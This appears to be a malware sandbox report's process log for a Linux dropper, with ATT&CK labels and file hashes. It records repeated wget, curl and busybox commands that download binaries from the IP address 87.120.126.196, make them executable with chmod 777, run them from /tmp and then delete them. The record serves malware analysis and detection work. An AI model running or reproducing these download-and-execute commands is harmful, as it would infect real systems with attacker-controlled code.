/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:935
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:941
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:947
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:953
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:959
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:962
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:965
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:971
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:974
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97